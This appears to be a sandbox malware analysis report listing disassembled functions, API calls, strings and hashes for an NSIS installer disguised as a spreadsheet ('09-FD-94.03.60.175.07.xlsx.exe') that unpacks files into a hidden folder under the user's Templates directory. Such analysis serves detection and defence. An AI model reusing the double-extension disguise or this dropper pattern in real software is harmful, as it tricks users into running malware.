                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: &B
                                                          • API String ID: 3282139019-3208460036
                                                          • Opcode ID: 1ba26ddb7cc3656f9a64845b4b1793df4e6810f285f0ef41b34257c574bccbbf
                                                          • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                          • Opcode Fuzzy Hash: 1ba26ddb7cc3656f9a64845b4b1793df4e6810f285f0ef41b34257c574bccbbf
                                                          • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                          Function 0040391F Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 277 40391f-403937 call 4062b2 280 403939-403949 call 405e8f 277->280 281 40394b-403982 call 405e15 277->281 289 4039a5-4039ce call 403bf5 call 405a9b 280->289 285 403984-403995 call 405e15 281->285 286 40399a-4039a0 lstrcatW 281->286 285->286 286->289 295 403a60-403a68 call 405a9b 289->295 296 4039d4-4039d9 289->296 301 403a76-403a9b LoadImageW 295->301 302 403a6a-403a71 call 405f6a 295->302 296->295 297 4039df-403a07 call 405e15 296->297 297->295 307 403a09-403a0d 297->307 305 403b1c-403b24 call 40140b 301->305 306 403a9d-403acd RegisterClassW 301->306 302->301 320 403b26-403b29 305->320 321 403b2e-403b39 call 403bf5 305->321 310 403ad3-403b17 SystemParametersInfoW CreateWindowExW 306->310 311 403beb 306->311 308 403a1f-403a2b lstrlenW 307->308 309 403a0f-403a1c call 4059c0 307->309 314 403a53-403a5b call 405993 call 405f48 308->314 315 403a2d-403a3b lstrcmpiW 308->315 309->308 310->305 317 403bed-403bf4 311->317 314->295 315->314 319 403a3d-403a47 GetFileAttributesW 315->319 323 403a49-403a4b 319->323 324 403a4d-403a4e call 4059df 319->324 320->317 330 403bc2-403bc3 call 4052c5 321->330 331 403b3f-403b5c ShowWindow LoadLibraryW 321->331 323->314 323->324 324->314 335 403bc8-403bca 330->335 333 403b65-403b77 GetClassInfoW 331->333 334 403b5e-403b63 LoadLibraryW 331->334 336 403b79-403b89 GetClassInfoW RegisterClassW 333->336 337 403b8f-403bb2 DialogBoxParamW call 40140b 333->337 334->333 339 403be4-403be6 call 40140b 335->339 340 403bcc-403bd2 335->340 336->337 341 403bb7-403bc0 call 40386f 337->341 339->311 340->320 342 403bd8-403bdf call 40140b 340->342 341->317 342->320
                                                          APIs
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 004039A0
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy), ref: 00403A87
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                          • API String ID: 914957316-1379373393
                                                          • Opcode ID: 88edaa45a3bb59404545fecdb829bfa4bbc7651b3de16964f3c32b9c1e3b42f4
                                                          • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                          • Opcode Fuzzy Hash: 88edaa45a3bb59404545fecdb829bfa4bbc7651b3de16964f3c32b9c1e3b42f4
                                                          • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                          Function 00402DBC Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 348 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bb4 351 402e16-402e44 call 405f48 call 4059df call 405f48 GetFileSize 348->351 352 402e0c-402e11 348->352 360 402f34-402f42 call 402d1a 351->360 361 402e4a-402e61 351->361 353 40305b-40305f 352->353 367 403013-403018 360->367 368 402f48-402f4b 360->368 363 402e63 361->363 364 402e65-402e72 call 4032f9 361->364 363->364 372 402e78-402e7e 364->372 373 402fcf-402fd7 call 402d1a 364->373 367->353 370 402f77-402fc3 GlobalAlloc call 4063ce call 405be3 CreateFileW 368->370 371 402f4d-402f65 call 40330f call 4032f9 368->371 397 402fc5-402fca 370->397 398 402fd9-403009 call 40330f call 403062 370->398 371->367 400 402f6b-402f71 371->400 377 402e80-402e98 call 405b6f 372->377 378 402efe-402f02 372->378 373->367 384 402f0b-402f11 377->384 393 402e9a-402ea1 377->393 383 402f04-402f0a call 402d1a 378->383 378->384 383->384 385 402f13-402f21 call 406360 384->385 386 402f24-402f2e 384->386 385->386 386->360 386->361 393->384 399 402ea3-402eaa 393->399 397->353 408 40300e-403011 398->408 399->384 401 402eac-402eb3 399->401 400->367 400->370 401->384 403 402eb5-402ebc 401->403 403->384 405 402ebe-402ede 403->405 405->367 407 402ee4-402ee8 405->407 409 402ef0-402ef8 407->409 410 402eea-402eee 407->410 408->367 411 40301a-40302b 408->411 409->384 412 402efa-402efc 409->412 410->360 410->409 413 403033-403038 411->413 414 40302d 411->414 412->384 415 403039-40303f 413->415 414->413 415->415 416 403041-403059 call 405b6f 415->416 416->353
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,?), ref: 00402DEC
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00402E35
                                                          • GlobalAlloc.KERNELBASE(?,00409230), ref: 00402F7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-1138875742
                                                          • Opcode ID: 2c04d8be77adb3a6b73fa5f9521984b3b61a83da92e99188d87d195f815dd541
                                                          • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                          • Opcode Fuzzy Hash: 2c04d8be77adb3a6b73fa5f9521984b3b61a83da92e99188d87d195f815dd541
                                                          • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                          Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 545 401752-401777 call 402b3a call 405a0a 550 401781-401793 call 405f48 call 405993 lstrcatW 545->550 551 401779-40177f call 405f48 545->551 557 401798-401799 call 4061dc 550->557 551->557 560 40179e-4017a2 557->560 561 4017a4-4017ae call 40628b 560->561 562 4017d5-4017d8 560->562 570 4017c0-4017d2 561->570 571 4017b0-4017be CompareFileTime 561->571 564 4017e0-4017fc call 405bb4 562->564 565 4017da-4017db call 405b8f 562->565 572 401870-401899 call 4051f2 call 403062 564->572 573 4017fe-401801 564->573 565->564 570->562 571->570 587 4018a1-4018ad SetFileTime 572->587 588 40189b-40189f 572->588 574 401852-40185c call 4051f2 573->574 575 401803-401841 call 405f48 * 2 call 405f6a call 405f48 call 405724 573->575 585 401865-40186b 574->585 575->560 608 401847-401848 575->608 589 4029d0 585->589 591 4018b3-4018be CloseHandle 587->591 588->587 588->591 592 4029d2-4029d6 589->592 594 4018c4-4018c7 591->594 595 4029c7-4029ca 591->595 597 4018c9-4018da call 405f6a lstrcatW 594->597 598 4018dc-4018df call 405f6a 594->598 595->589 603 4018e4-402243 call 405724 597->603 598->603 603->592 608->585 610 40184a-40184b 608->610 610->574
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,?,00000031), ref: 00401793
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,?,00000031), ref: 004017B8
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp$C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling$Call
                                                          • API String ID: 1941528284-3436744434
                                                          • Opcode ID: 0879d69bed4c8f472b86b9e85b84126f8f74c5a625f2fad1261ba299a3e5c0dd
                                                          • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                          • Opcode Fuzzy Hash: 0879d69bed4c8f472b86b9e85b84126f8f74c5a625f2fad1261ba299a3e5c0dd
                                                          • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                          Function 004051F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 611 4051f2-405207 612 40520d-40521e 611->612 613 4052be-4052c2 611->613 614 405220-405224 call 405f6a 612->614 615 405229-405235 lstrlenW 612->615 614->615 617 405252-405256 615->617 618 405237-405247 lstrlenW 615->618 620 405265-405269 617->620 621 405258-40525f SetWindowTextW 617->621 618->613 619 405249-40524d lstrcatW 618->619 619->617 622 40526b-4052ad SendMessageW * 3 620->622 623 4052af-4052b1 620->623 621->620 622->623 623->613 624 4052b3-4052b6 623->624 624->613
                                                          APIs
                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                          • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll), ref: 0040525F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll
                                                          • API String ID: 2531174081-1312793894
                                                          • Opcode ID: f10eb8b4edb837a623621e96def193046de5dd0ca1a8e17f40592997c05f4a34
                                                          • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                          • Opcode Fuzzy Hash: f10eb8b4edb837a623621e96def193046de5dd0ca1a8e17f40592997c05f4a34
                                                          • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                          Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 625 402573-402588 call 402b1d 628 4029c7-4029ca 625->628 629 40258e-402595 625->629 630 4029d0-4029d6 628->630 631 402597 629->631 632 40259a-40259d 629->632 631->632 634 4025a3-4025b2 call 405ea8 632->634 635 4026e6-4026ee 632->635 634->635 638 4025b8 634->638 635->628 639 4025be-4025c2 638->639 640 402657-402667 call 405c37 639->640 641 4025c8-4025e3 ReadFile 639->641 640->635 648 402669 640->648 641->635 642 4025e9-4025ee 641->642 642->635 644 4025f4-402602 642->644 646 4026a2-4026ae call 405e8f 644->646 647 402608-40261a MultiByteToWideChar 644->647 646->630 647->648 650 40261c-40261f 647->650 651 40266c-40266f 648->651 653 402621-40262c 650->653 651->646 654 402671-402676 651->654 653->651 655 40262e-402653 SetFilePointer MultiByteToWideChar 653->655 656 4026b3-4026b7 654->656 657 402678-40267d 654->657 655->653 660 402655 655->660 658 4026d4-4026e0 SetFilePointer 656->658 659 4026b9-4026bd 656->659 657->656 661 40267f-402692 657->661 658->635 662 4026c5-4026d2 659->662 663 4026bf-4026c3 659->663 660->648 661->635 664 402694-40269a 661->664 662->635 663->658 663->662 664->639 665 4026a0 664->665 665->635
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F
                                                            • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                          • String ID: 9
                                                          • API String ID: 1149667376-2366072709
                                                          • Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                          • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                          • Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                          • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                          Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 666 4015b9-4015cd call 402b3a call 405a3e 671 401614-401617 666->671 672 4015cf-4015eb call 4059c0 CreateDirectoryW 666->672 674 401646-402197 call 401423 671->674 675 401619-401638 call 401423 call 405f48 SetCurrentDirectoryW 671->675 679 40160a-401612 672->679 680 4015ed-4015f8 GetLastError 672->680 688 402793-40279a 674->688 689 4029c7-4029d6 674->689 675->689 690 40163e-401641 675->690 679->671 679->672 684 401607 680->684 685 4015fa-401605 GetFileAttributesW 680->685 684->679 685->679 685->684 688->689 690->689
                                                          APIs
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,75572EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405A4C
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015FD
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,00000000,?), ref: 00401630
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling, xrefs: 00401623
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling
                                                          • API String ID: 3751793516-3871883919
                                                          • Opcode ID: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                          • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                          • Opcode Fuzzy Hash: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                          • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
